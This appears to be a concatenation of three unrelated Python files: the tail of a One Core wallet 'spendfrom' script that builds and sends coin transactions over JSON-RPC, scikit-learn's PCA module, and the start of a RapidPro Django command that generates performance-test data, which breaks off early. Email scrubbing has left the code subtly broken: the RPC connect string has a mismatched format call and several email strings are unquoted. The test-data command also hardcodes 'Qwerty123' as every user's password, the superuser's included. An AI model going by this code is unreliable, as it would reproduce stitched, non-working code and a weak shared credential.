--to=ADDRESS --amount=11.00\n#\n# Assumes it will talk to a oned or One-Qt running\n# on localhost.\n#\n# Depends on jsonrpc\n#\n\nfrom decimal import *\nimport getpass\nimport math\nimport os\nimport os.path\nimport platform\nimport sys\nimport time\nfrom jsonrpc import ServiceProxy, json\n\nBASE_FEE=Decimal(""0.001"")\n\ndef check_json_precision():\n """"""Make sure json library being used does not lose precision converting BTC values""""""\n n = Decimal(""20000000.00000003"")\n satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)\n if satoshis != 2000000000000003:\n raise RuntimeError(""JSON encode/decode loses precision"")\n\ndef determine_db_dir():\n """"""Return the default location of the One Core data directory""""""\n if platform.system() == ""Darwin"":\n return os.path.expanduser(""~/Library/Application Support/OneCore/"")\n elif platform.system() == ""Windows"":\n return os.path.join(os.environ[\'APPDATA\'], ""OneCore"")\n return os.path.expanduser(""~/.onecore"")\n\ndef read_bitcoin_config(dbdir):\n """"""Read the one.conf file from dbdir, returns dictionary of settings""""""\n from ConfigParser import SafeConfigParser\n\n class FakeSecHead(object):\n def __init__(self, fp):\n self.fp = fp\n self.sechead = \'[all]\\n\'\n def readline(self):\n if self.sechead:\n try: return self.sechead\n finally: self.sechead = None\n else:\n s = self.fp.readline()\n if s.find(\'#\') != -1:\n s = s[0:s.find(\'#\')].strip() +""\\n""\n return s\n\n config_parser = SafeConfigParser()\n config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, ""one.conf""))))\n return dict(config_parser.items(""all""))\n\ndef connect_JSON(config):\n """"""Connect to a One Core JSON-RPC server""""""\n testnet = config.get(\'testnet\', \'0\')\n testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False\n if not \'rpcport\' in config:\n config[\'rpcport\'] = 19998 if testnet else 9876\n connect = ""http://%s:dummy@email.com:%s""%(config[\'rpcuser\'], config[\'rpcpassword\'], config[\'rpcport\'])\n try:\n result = ServiceProxy(connect)\n # ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,\n # but also make sure the oned we\'re talking to is/isn\'t testnet:\n if result.getmininginfo()[\'testnet\'] != testnet:\n sys.stderr.write(""RPC server at ""+connect+"" testnet setting mismatch\\n"")\n sys.exit(1)\n return result\n except:\n sys.stderr.write(""Error connecting to RPC server at ""+connect+""\\n"")\n sys.exit(1)\n\ndef unlock_wallet(oned):\n info = oned.getinfo()\n if \'unlocked_until\' not in info:\n return True # wallet is not encrypted\n t = int(info[\'unlocked_until\'])\n if t <= time.time():\n try:\n passphrase = getpass.getpass(""Wallet is locked; enter passphrase: "")\n oned.walletpassphrase(passphrase, 5)\n except:\n sys.stderr.write(""Wrong passphrase\\n"")\n\n info = oned.getinfo()\n return int(info[\'unlocked_until\']) > time.time()\n\ndef list_available(oned):\n address_summary = dict()\n\n address_to_account = dict()\n for info in oned.listreceivedbyaddress(0):\n address_to_account[info[""address""]] = info[""account""]\n\n unspent = oned.listunspent(0)\n for output in unspent:\n # listunspent doesn\'t give addresses, so:\n rawtx = oned.getrawtransaction(output[\'txid\'], 1)\n vout = rawtx[""vout""][output[\'vout\']]\n pk = vout[""scriptPubKey""]\n\n # This code only deals with ordinary pay-to-one-address\n # or pay-to-script-hash outputs right now; anything exotic is ignored.\n if pk[""type""] != ""pubkeyhash"" and pk[""type""] != ""scripthash"":\n continue\n\n address = pk[""addresses""][0]\n if address in address_summary:\n address_summary[address][""total""] += vout[""value""]\n address_summary[address][""outputs""].append(output)\n else:\n address_summary[address] = {\n ""total"" : vout[""value""],\n ""outputs"" : [output],\n ""account"" : address_to_account.get(address, """")\n }\n\n return address_summary\n\ndef select_coins(needed, inputs):\n # Feel free to improve this, this is good enough for my simple needs:\n outputs = []\n have = Decimal(""0.0"")\n n = 0\n while have < needed and n < len(inputs):\n outputs.append({ ""txid"":inputs[n][""txid""], ""vout"":inputs[n][""vout""]})\n have += inputs[n][""amount""]\n n += 1\n return (outputs, have-needed)\n\ndef create_tx(oned, fromaddresses, toaddress, amount, fee):\n all_coins = list_available(oned)\n\n total_available = Decimal(""0.0"")\n needed = amount+fee\n potential_inputs = []\n for addr in fromaddresses:\n if addr not in all_coins:\n continue\n potential_inputs.extend(all_coins[addr][""outputs""])\n total_available += all_coins[addr][""total""]\n\n if total_available < needed:\n sys.stderr.write(""Error, only %f BTC available, need %f\\n""%(total_available, needed));\n sys.exit(1)\n\n #\n # Note:\n # Python\'s json/jsonrpc modules have inconsistent support for Decimal numbers.\n # Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode\n # Decimals, I\'m casting amounts to float before sending them to oned.\n #\n outputs = { toaddress : float(amount) }\n (inputs, change_amount) = select_coins(needed, potential_inputs)\n if change_amount > BASE_FEE: # don\'t bother with zero or tiny change\n change_address = fromaddresses[-1]\n if change_address in outputs:\n outputs[change_address] += float(change_amount)\n else:\n outputs[change_address] = float(change_amount)\n\n rawtx = oned.createrawtransaction(inputs, outputs)\n signed_rawtx = oned.signrawtransaction(rawtx)\n if not signed_rawtx[""complete""]:\n sys.stderr.write(""signrawtransaction failed\\n"")\n sys.exit(1)\n txdata = signed_rawtx[""hex""]\n\n return txdata\n\ndef compute_amount_in(oned, txinfo):\n result = Decimal(""0.0"")\n for vin in txinfo[\'vin\']:\n in_info = oned.getrawtransaction(vin[\'txid\'], 1)\n vout = in_info[\'vout\'][vin[\'vout\']]\n result = result + vout[\'value\']\n return result\n\ndef compute_amount_out(txinfo):\n result = Decimal(""0.0"")\n for vout in txinfo[\'vout\']:\n result = result + vout[\'value\']\n return result\n\ndef sanity_test_fee(oned, txdata_hex, max_fee):\n class FeeError(RuntimeError):\n pass\n try:\n txinfo = oned.decoderawtransaction(txdata_hex)\n total_in = compute_amount_in(oned, txinfo)\n total_out = compute_amount_out(txinfo)\n if total_in-total_out > max_fee:\n raise FeeError(""Rejecting transaction, unreasonable fee of ""+str(total_in-total_out))\n\n tx_size = len(txdata_hex)/2\n kb = tx_size/1000 # integer division rounds down\n if kb > 1 and fee < BASE_FEE:\n raise FeeError(""Rejecting no-fee transaction, larger than 1000 bytes"")\n if total_in < 0.01 and fee < BASE_FEE:\n raise FeeError(""Rejecting no-fee, tiny-amount transaction"")\n # Exercise for the reader: compute transaction priority, and\n # warn if this is a very-low-priority transaction\n\n except FeeError as err:\n sys.stderr.write((str(err)+""\\n""))\n sys.exit(1)\n\ndef main():\n import optparse\n\n parser = optparse.OptionParser(usage=""%prog [options]"")\n parser.add_option(""--from"", dest=""fromaddresses"", default=None,\n help=""addresses to get ones from"")\n parser.add_option(""--to"", dest=""to"", default=None,\n help=""address to get send ones to"")\n parser.add_option(""--amount"", dest=""amount"", default=None,\n help=""amount to send"")\n parser.add_option(""--fee"", dest=""fee"", default=""0.0"",\n help=""fee to include"")\n parser.add_option(""--datadir"", dest=""datadir"", default=determine_db_dir(),\n help=""location of one.conf file with RPC username/password (default: %default)"")\n parser.add_option(""--testnet"", dest=""testnet"", default=False, action=""store_true"",\n help=""Use the test network"")\n parser.add_option(""--dry_run"", dest=""dry_run"", default=False, action=""store_true"",\n help=""Don\'t broadcast the transaction, just create and print the transaction data"")\n\n (options, args) = parser.parse_args()\n\n check_json_precision()\n config = read_bitcoin_config(options.datadir)\n if options.testnet: config[\'testnet\'] = True\n oned = connect_JSON(config)\n\n if options.amount is None:\n address_summary = list_available(oned)\n for address,info in address_summary.iteritems():\n n_transactions = len(info[\'outputs\'])\n if n_transactions > 1:\n print(""%s %.8f %s (%d transactions)""%(address, info[\'total\'], info[\'account\'], n_transactions))\n else:\n print(""%s %.8f %s""%(address, info[\'total\'], info[\'account\']))\n else:\n fee = Decimal(options.fee)\n amount = Decimal(options.amount)\n while unlock_wallet(oned) == False:\n pass # Keep asking for passphrase until they get it right\n txdata = create_tx(oned, options.fromaddresses.split("",""), options.to, amount, fee)\n sanity_test_fee(oned, txdata, amount*Decimal(""0.01""))\n if options.dry_run:\n print(txdata)\n else:\n txid = oned.sendrawtransaction(txdata)\n print(txid)\n\nif __name__ == \'__main__\':\n main()\n', '"""""" Principal Component Analysis\n""""""\n\n# Author: Alexandre Gramfort dummy@email.com\n# Olivier Grisel dummy@email.com\n# Mathieu Blondel dummy@email.com\n# Denis A. Engemann dummy@email.com\n#\n# License: BSD 3 clause\n\nfrom math import log, sqrt\nimport warnings\n\nimport numpy as np\nfrom scipy import linalg\nfrom scipy.special import gammaln\n\nfrom ..base import BaseEstimator, TransformerMixin\nfrom ..utils import array2d, check_random_state, as_float_array\nfrom ..utils import atleast2d_or_csr\nfrom ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \\\n fast_dot\n\n\ndef _assess_dimension_(spectrum, rank, n_samples, n_features):\n """"""Compute the likelihood of a rank ``rank`` dataset\n\n The dataset is assumed to be embedded in gaussian noise of shape(n,\n dimf) having spectrum ``spectrum``.\n\n Parameters\n ----------\n spectrum: array of shape (n)\n data spectrum\n rank: int,\n tested rank value\n n_samples: int,\n number of samples\n dim: int,\n embedding/empirical dimension\n\n Returns\n -------\n ll: float,\n The log-likelihood\n\n Notes\n -----\n This implements the method of `Thomas P. Minka:\n Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`\n """"""\n if rank > len(spectrum):\n raise ValueError(""The tested rank cannot exceed the rank of the""\n "" dataset"")\n\n pu = -rank * log(2.)\n for i in range(rank):\n pu += (gammaln((n_features - i) / 2.)\n - log(np.pi) * (n_features - i) / 2.)\n\n pl = np.sum(np.log(spectrum[:rank]))\n pl = -pl * n_samples / 2.\n\n if rank == n_features:\n pv = 0\n v = 1\n else:\n v = np.sum(spectrum[rank:]) / (n_features - rank)\n pv = -np.log(v) * n_samples * (n_features - rank) / 2.\n\n m = n_features * rank - rank * (rank + 1.) / 2.\n pp = log(2. * np.pi) * (m + rank + 1.) / 2.\n\n pa = 0.\n spectrum_ = spectrum.copy()\n spectrum_[rank:n_features] = v\n for i in range(rank):\n for j in range(i + 1, len(spectrum)):\n pa += log((spectrum[i] - spectrum[j]) *\n (1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples)\n\n ll = pu + pl + pv + pp - pa / 2. - rank * log(n_samples) / 2.\n\n return ll\n\n\ndef _infer_dimension_(spectrum, n_samples, n_features):\n """"""Infers the dimension of a dataset of shape (n_samples, n_features)\n\n The dataset is described by its spectrum `spectrum`.\n """"""\n n_spectrum = len(spectrum)\n ll = np.empty(n_spectrum)\n for rank in range(n_spectrum):\n ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features)\n return ll.argmax()\n\n\nclass PCA(BaseEstimator, TransformerMixin):\n """"""Principal component analysis (PCA)\n\n Linear dimensionality reduction using Singular Value Decomposition of the\n data and keeping only the most significant singular vectors to project the\n data to a lower dimensional space.\n\n This implementation uses the scipy.linalg implementation of the singular\n value decomposition. It only works for dense arrays and is not scalable to\n large dimensional data.\n\n The time complexity of this implementation is ``O(n ** 3)`` assuming\n n ~ n_samples ~ n_features.\n\n Parameters\n ----------\n n_components : int, None or string\n Number of components to keep.\n if n_components is not set all components are kept::\n\n n_components == min(n_samples, n_features)\n\n if n_components == \'mle\', Minka\\\'s MLE is used to guess the dimension\n if ``0 < n_components < 1``, select the number of components such that\n the amount of variance that needs to be explained is greater than the\n percentage specified by n_components\n\n copy : bool\n If False, data passed to fit are overwritten and running\n fit(X).transform(X) will not yield the expected results,\n use fit_transform(X) instead.\n\n whiten : bool, optional\n When True (False by default) the `components_` vectors are divided\n by n_samples times singular values to ensure uncorrelated outputs\n with unit component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making there data respect some hard-wired assumptions.\n\n Attributes\n ----------\n `components_` : array, [n_components, n_features]\n Components with maximum variance.\n\n `explained_variance_ratio_` : array, [n_components]\n Percentage of variance explained by each of the selected components. \\\n k is not set then all components are stored and the sum of explained \\\n variances is equal to 1.0\n\n `n_components_` : int\n The estimated number of components. Relevant when n_components is set\n to \'mle\' or a number between 0 and 1 to select using explained\n variance.\n\n Notes\n -----\n For n_components=\'mle\', this class uses the method of `Thomas P. Minka:\n Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`\n\n Due to implementation subtleties of the Singular Value Decomposition (SVD),\n which is used in this implementation, running fit twice on the same matrix\n can lead to principal components with signs flipped (change in direction).\n For this reason, it is important to always use the same estimator object to\n transform data in a consistent fashion.\n\n Examples\n --------\n\n >>> import numpy as np\n >>> from sklearn.decomposition import PCA\n >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n >>> pca = PCA(n_components=2)\n >>> pca.fit(X)\n PCA(copy=True, n_components=2, whiten=False)\n >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS\n [ 0.99244... 0.00755...]\n\n See also\n --------\n ProbabilisticPCA\n RandomizedPCA\n KernelPCA\n SparsePCA\n TruncatedSVD\n """"""\n def __init__(self, n_components=None, copy=True, whiten=False):\n self.n_components = n_components\n self.copy = copy\n self.whiten = whiten\n\n def fit(self, X, y=None):\n """"""Fit the model with X.\n\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n self : object\n Returns the instance itself.\n """"""\n self._fit(X)\n return self\n\n def fit_transform(self, X, y=None):\n """"""Fit the model with X and apply the dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Training data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n U, S, V = self._fit(X)\n U = U[:, :self.n_components_]\n\n if self.whiten:\n # X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples)\n U *= sqrt(X.shape[0])\n else:\n # X_new = X * V = U * S * V^T * V = U * S\n U *= S[:self.n_components_]\n\n return U\n\n def _fit(self, X):\n """""" Fit the model on X\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n\n Returns\n -------\n U, s, V : ndarrays\n The SVD of the input data, copied and centered when\n requested.\n """"""\n X = array2d(X)\n n_samples, n_features = X.shape\n X = as_float_array(X, copy=self.copy)\n # Center data\n self.mean_ = np.mean(X, axis=0)\n X -= self.mean_\n U, S, V = linalg.svd(X, full_matrices=False)\n self.explained_variance_ = (S ** 2) / n_samples\n self.explained_variance_ratio_ = (self.explained_variance_ /\n self.explained_variance_.sum())\n\n if self.whiten:\n self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)\n else:\n self.components_ = V\n\n n_components = self.n_components\n if n_components is None:\n n_components = n_features\n elif n_components == \'mle\':\n if n_samples < n_features:\n raise ValueError(""n_components=\'mle\' is only supported ""\n ""if n_samples >= n_features"")\n n_components = _infer_dimension_(self.explained_variance_,\n n_samples, n_features)\n\n if 0 < n_components < 1.0:\n # number of components for which the cumulated explained variance\n # percentage is superior to the desired threshold\n ratio_cumsum = self.explained_variance_ratio_.cumsum()\n n_components = np.sum(ratio_cumsum < n_components) + 1\n\n self.components_ = self.components_[:n_components, :]\n self.explained_variance_ = \\\n self.explained_variance_[:n_components]\n self.explained_variance_ratio_ = \\\n self.explained_variance_ratio_[:n_components]\n\n self.n_components_ = n_components\n return (U, S, V)\n\n def transform(self, X):\n """"""Apply the dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n New data, where n_samples is the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n X = array2d(X)\n if self.mean_ is not None:\n X = X - self.mean_\n X_transformed = fast_dot(X, self.components_.T)\n return X_transformed\n\n def inverse_transform(self, X):\n """"""Transform data back to its original space, i.e.,\n return an input X_original whose transform would be X\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_components)\n New data, where n_samples is the number of samples\n and n_components is the number of components.\n\n Returns\n -------\n X_original array-like, shape (n_samples, n_features)\n\n Notes\n -----\n If whitening is enabled, inverse_transform does not compute the\n exact inverse operation as transform.\n """"""\n return fast_dot(X, self.components_) + self.mean_\n\n\nclass ProbabilisticPCA(PCA):\n """"""Additional layer on top of PCA that adds a probabilistic evaluation""""""\n __doc__ += PCA.__doc__\n\n def fit(self, X, y=None, homoscedastic=True):\n """"""Additionally to PCA.fit, learns a covariance model\n\n Parameters\n ----------\n X : array of shape(n_samples, n_features)\n The data to fit\n\n homoscedastic : bool, optional,\n If True, average variance across remaining dimensions\n """"""\n PCA.fit(self, X)\n n_samples, n_features = X.shape\n self._dim = n_features\n Xr = X - self.mean_\n Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_)\n\n n_components = self.n_components\n if n_components is None:\n n_components = n_features\n\n # Make the low rank part of the estimated covariance\n self.covariance_ = np.dot(self.components_[:n_components].T *\n self.explained_variance_[:n_components],\n self.components_[:n_components])\n\n if n_features == n_components:\n delta = 0.\n elif homoscedastic:\n delta = (Xr ** 2).sum() / (n_samples * n_features)\n else:\n delta = (Xr ** 2).mean(axis=0) / (n_features - n_components)\n\n # Add delta to the diagonal without extra allocation\n self.covariance_.flat[::n_features + 1] += delta\n\n return self\n\n def score(self, X, y=None):\n """"""Return a score associated to new data\n\n Parameters\n ----------\n X: array of shape(n_samples, n_features)\n The data to test\n\n Returns\n -------\n ll: array of shape (n_samples),\n log-likelihood of each row of X under the current model\n """"""\n Xr = X - self.mean_\n n_features = X.shape[1]\n log_like = np.zeros(X.shape[0])\n self.precision_ = linalg.inv(self.covariance_)\n log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1)\n log_like -= .5 * (fast_logdet(self.covariance_)\n + n_features * log(2. * np.pi))\n return log_like\n\n\nclass RandomizedPCA(BaseEstimator, TransformerMixin):\n """"""Principal component analysis (PCA) using randomized SVD\n\n Linear dimensionality reduction using approximated Singular Value\n Decomposition of the data and keeping only the most significant\n singular vectors to project the data to a lower dimensional space.\n\n Parameters\n ----------\n n_components : int, optional\n Maximum number of components to keep. When not given or None, this\n is set to n_features (the second dimension of the training data).\n\n copy : bool\n If False, data passed to fit are overwritten and running\n fit(X).transform(X) will not yield the expected results,\n use fit_transform(X) instead.\n\n iterated_power : int, optional\n Number of iterations for the power method. 3 by default.\n\n whiten : bool, optional\n When True (False by default) the `components_` vectors are divided\n by the singular values to ensure uncorrelated outputs with unit\n component-wise variances.\n\n Whitening will remove some information from the transformed signal\n (the relative variance scales of the components) but can sometime\n improve the predictive accuracy of the downstream estimators by\n making their data respect some hard-wired assumptions.\n\n random_state : int or RandomState instance or None (default)\n Pseudo Random Number generator seed control. If None, use the\n numpy.random singleton.\n\n Attributes\n ----------\n `components_` : array, [n_components, n_features]\n Components with maximum variance.\n\n `explained_variance_ratio_` : array, [n_components]\n Percentage of variance explained by each of the selected components. \\\n k is not set then all components are stored and the sum of explained \\\n variances is equal to 1.0\n\n Examples\n --------\n >>> import numpy as np\n >>> from sklearn.decomposition import RandomizedPCA\n >>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n >>> pca = RandomizedPCA(n_components=2)\n >>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE\n RandomizedPCA(copy=True, iterated_power=3, n_components=2,\n random_state=None, whiten=False)\n >>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS\n [ 0.99244... 0.00755...]\n\n See also\n --------\n PCA\n ProbabilisticPCA\n TruncatedSVD\n\n References\n ----------\n\n .. [Halko2009] `Finding structure with randomness: Stochastic algorithms\n for constructing approximate matrix decompositions Halko, et al., 2009\n (arXiv:909)`\n\n .. [MRT] `A randomized algorithm for the decomposition of matrices\n Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`\n\n Notes\n -----\n This class supports sparse matrix input for backward compatibility, but\n actually computes a truncated SVD instead of a PCA in that case (i.e. no\n centering is performed). This support is deprecated; use the class\n TruncatedSVD for sparse matrix support.\n\n """"""\n\n def __init__(self, n_components=None, copy=True, iterated_power=3,\n whiten=False, random_state=None):\n self.n_components = n_components\n self.copy = copy\n self.iterated_power = iterated_power\n self.whiten = whiten\n self.mean_ = None\n self.random_state = random_state\n\n def fit(self, X, y=None):\n """"""Fit the model with X.\n\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n self : object\n Returns the instance itself.\n """"""\n self._fit(X)\n return self\n\n def _fit(self, X):\n """"""Fit the model to the data X.\n\n Parameters\n ----------\n X: array-like, shape (n_samples, n_features)\n Training vector, where n_samples in the number of samples and\n n_features is the number of features.\n\n Returns\n -------\n X : ndarray, shape (n_samples, n_features)\n The input data, copied, centered and whitened when requested.\n """"""\n random_state = check_random_state(self.random_state)\n if hasattr(X, \'todense\'):\n warnings.warn(""Sparse matrix support is deprecated""\n "" and will be dropped in 0.16.""\n "" Use TruncatedSVD instead."",\n DeprecationWarning)\n else:\n # not a sparse matrix, ensure this is a 2D array\n X = np.atleast_2d(as_float_array(X, copy=self.copy))\n\n n_samples = X.shape[0]\n\n if not hasattr(X, \'todense\'):\n # Center data\n self.mean_ = np.mean(X, axis=0)\n X -= self.mean_\n if self.n_components is None:\n n_components = X.shape[1]\n else:\n n_components = self.n_components\n\n U, S, V = randomized_svd(X, n_components,\n n_iter=self.iterated_power,\n random_state=random_state)\n\n self.explained_variance_ = exp_var = (S ** 2) / n_samples\n self.explained_variance_ratio_ = exp_var / exp_var.sum()\n\n if self.whiten:\n self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)\n else:\n self.components_ = V\n\n return X\n\n def transform(self, X, y=None):\n """"""Apply dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n New data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n # XXX remove scipy.sparse support here in 0.16\n X = atleast2d_or_csr(X)\n if self.mean_ is not None:\n X = X - self.mean_\n\n X = safe_sparse_dot(X, self.components_.T)\n return X\n\n def fit_transform(self, X, y=None):\n """"""Apply dimensionality reduction on X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n New data, where n_samples in the number of samples\n and n_features is the number of features.\n\n Returns\n -------\n X_new : array-like, shape (n_samples, n_components)\n\n """"""\n X = self._fit(atleast2d_or_csr(X))\n X = safe_sparse_dot(X, self.components_.T)\n return X\n\n def inverse_transform(self, X, y=None):\n """"""Transform data back to its original space.\n\n Returns an array X_original whose transform would be X.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_components)\n New data, where n_samples in the number of samples\n and n_components is the number of components.\n\n Returns\n -------\n X_original array-like, shape (n_samples, n_features)\n\n Notes\n -----\n If whitening is enabled, inverse_transform does not compute the\n exact inverse operation of transform.\n """"""\n # XXX remove scipy.sparse support here in 0.16\n X_original = safe_sparse_dot(X, self.components_)\n if self.mean_ is not None:\n X_original = X_original + self.mean_\n return X_original\n', 'from __future__ import unicode_literals, division, print_function\n\nimport json\nimport math\nimport pytz\nimport random\nimport resource\nimport six\nimport sys\nimport time\nimport uuid\n\nfrom collections import defaultdict\nfrom datetime import timedelta\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.management import BaseCommand, CommandError\nfrom django.core.management.base import CommandParser\nfrom django.db import connection, transaction\nfrom django.utils import timezone\nfrom django_redis import get_redis_connection\nfrom subprocess import check_call, CalledProcessError\nfrom temba.channels.models import Channel\nfrom temba.channels.tasks import squash_channelcounts\nfrom temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME\nfrom temba.flows.models import FlowStart, FlowRun\nfrom temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages\nfrom temba.locations.models import AdminBoundary\nfrom temba.msgs.models import Label, Msg\nfrom temba.msgs.tasks import squash_labelcounts\nfrom temba.orgs.models import Org\nfrom temba.orgs.tasks import squash_topupcredits\nfrom temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms\nfrom temba.values.models import Value\n\n\n# maximum age in days of database content\nCONTENT_AGE = 3 * 365\n\n# every user will have this password including the superuser\nUSER_PASSWORD = ""Qwerty123""\n\n# database dump containing admin boundary records\nLOCATIONS_DUMP = \'test-data/nigeria.bin\'\n\n# organization names are generated from these components\nORG_NAMES = (\n (""UNICEF"", ""WHO"", ""WFP"", ""UNESCO"", ""UNHCR"", ""UNITAR"", ""FAO"", ""UNEP"", ""UNAIDS"", ""UNDAF""),\n (""Nigeria"", ""Chile"", ""Indonesia"", ""Rwanda"", ""Mexico"", ""Zambia"", ""India"", ""Brazil"", ""Sudan"", ""Mozambique"")\n)\n\n# the users, channels, groups, labels and fields to create for each organization\nUSERS = (\n {\'username\': ""admin%d"", \'email\': dummy@email.com"", \'role\': \'administrators\'},\n {\'username\': ""editor%d"", \'email\': dummy@email.com"", \'role\': \'editors\'},\n {\'username\': ""viewer%d"", \'email\': dummy@email.com"", \'role\': \'viewers\'},\n {\'username\': ""surveyor%d"", \'email\': dummy@email.com"", \'role\': \'surveyors\'},\n)\nCHANNELS = (\n {\'name\': ""Android"", \'channel_type\': Channel.TYPE_ANDROID, \'scheme\': \'tel\', \'address\': ""1234""},\n {\'name\': ""Nexmo"", \'channel_type\': Channel.TYPE_NEXMO, \'scheme\': \'tel\', \'address\': ""2345""},\n {\'name\': ""Twitter"", \'channel_type\': \'TT\', \'scheme\': \'twitter\', \'address\': ""my_handle""},\n)\nFIELDS = (\n {\'key\': \'gender\', \'label\': ""Gender"", \'value_type\': Value.TYPE_TEXT},\n {\'key\': \'age\', \'label\': ""Age"", \'value_type\': Value.TYPE_DECIMAL},\n {\'key\': \'joined\', \'label\': ""Joined On"", \'value_type\': Value.TYPE_DATETIME},\n {\'key\': \'ward\', \'label\': ""Ward"", \'value_type\': Value.TYPE_WARD},\n {\'key\': \'district\', \'label\': ""District"", \'value_type\': Value.TYPE_DISTRICT},\n {\'key\': \'state\', \'label\': ""State"", \'value_type\': Value.TYPE_STATE},\n)\nGROUPS = (\n {\'name\': ""Reporters"", \'query\': None, \'member\': 0.95}, # member is either a probability or callable\n {\'name\': ""Farmers"", \'query\': None, \'member\': 0.5},\n {\'name\': ""Doctors"", \'query\': None, \'member\': 0.4},\n {\'name\': ""Teachers"", \'query\': None, \'member\': 0.3},\n {\'name\': ""Drivers"", \'query\': None, \'member\': 0.2},\n {\'name\': ""Testers"", \'query\': None, \'member\': 0.1},\n {\'name\': ""Empty"", \'query\': None, \'member\': 0.0},\n {\'name\': ""Youth (Dynamic)"", \'query\': \'age <= 18\', \'member\': lambda c: c[\'age\'] and c[\'age\'] <= 18},\n {\'name\': ""Unregistered (Dynamic)"", \'query\': \'joined = """"\', \'member\': lambda c: not c[\'joined\']},\n {\'name\': ""Districts (Dynamic)"", \'query\': \'district=Faskari or district=Zuru or district=Anka\',\n \'member\': lambda c: c[\'district\'] and c[\'district\'].name in (""Faskari"", ""Zuru"", ""Anka"")},\n)\nLABELS = (""Reporting"", ""Testing"", ""Youth"", ""Farming"", ""Health"", ""Education"", ""Trade"", ""Driving"", ""Building"", ""Spam"")\nFLOWS = (\n {\'name\': ""Favorites"", \'file\': ""favorites.json"", \'templates\': (\n [""blue"", ""mutzig"", ""bob""],\n [""orange"", ""green"", ""primus"", ""jeb""],\n )},\n {\'name\': ""SMS Form"", \'file\': ""sms_form.json"", \'templates\': ([""22 F Seattle""], [""35 M MIAMI""])},\n {\'name\': ""Pick a Number"", \'file\': ""pick_a_number.json"", \'templates\': ([""1""], [""4""], [""5""], [""7""], [""8""])}\n)\n\n# contact names are generated from these components\nCONTACT_NAMES = (\n ("""", ""Anne"", ""Bob"", ""Cathy"", ""Dave"", ""Evan"", ""Freda"", ""George"", ""Hallie"", ""Igor""),\n ("""", ""Jameson"", ""Kardashian"", ""Lopez"", ""Mooney"", ""Newman"", ""O\'Shea"", ""Poots"", ""Quincy"", ""Roberts""),\n)\nCONTACT_LANGS = (None, ""eng"", ""fre"", ""spa"", ""kin"")\nCONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number\nCONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle\nCONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped\nCONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked\nCONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted\nCONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact\n\nRUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to\nINBOX_MESSAGES = ((""What is"", ""I like"", ""No""), (""beer"", ""tea"", ""coffee""), (""thank you"", ""please"", ""today""))\n\n\nclass Command(BaseCommand):\n COMMAND_GENERATE = \'generate\'\n COMMAND_SIMULATE = \'simulate\'\n\n help = ""Generates a database suitable for performance testing""\n\n def add_arguments(self, parser):\n cmd = self\n subparsers = parser.add_subparsers(dest=\'command\', help=\'Command to perform\',\n parser_class=lambda **kw: CommandParser(cmd, **kw))\n\n gen_parser = subparsers.add_parser(\'generate\', help=\'Generates a clean testing database\')\n gen_parser.add_argument(\'--orgs\', type=int, action=\'store\', dest=\'num_orgs\', default=100)\n gen_parser.add_argument(\'--contacts\', type=int, action=\'store\', dest=\'num_contacts\', default=1000000)\n gen_parser.add_argument(\'--seed\', type=int, action=\'store\', dest=\'seed\', default=None)\n\n sim_parser = subparsers.add_parser(\'simulate\', help=\'Simulates activity on an existing database\')\n sim_parser.add_argument(\'--runs\', type=int, action=\'store\', dest=\'num_runs\', default=500)\n\n def handle(self, command, *args, **kwargs):\n start = time.time()\n\n 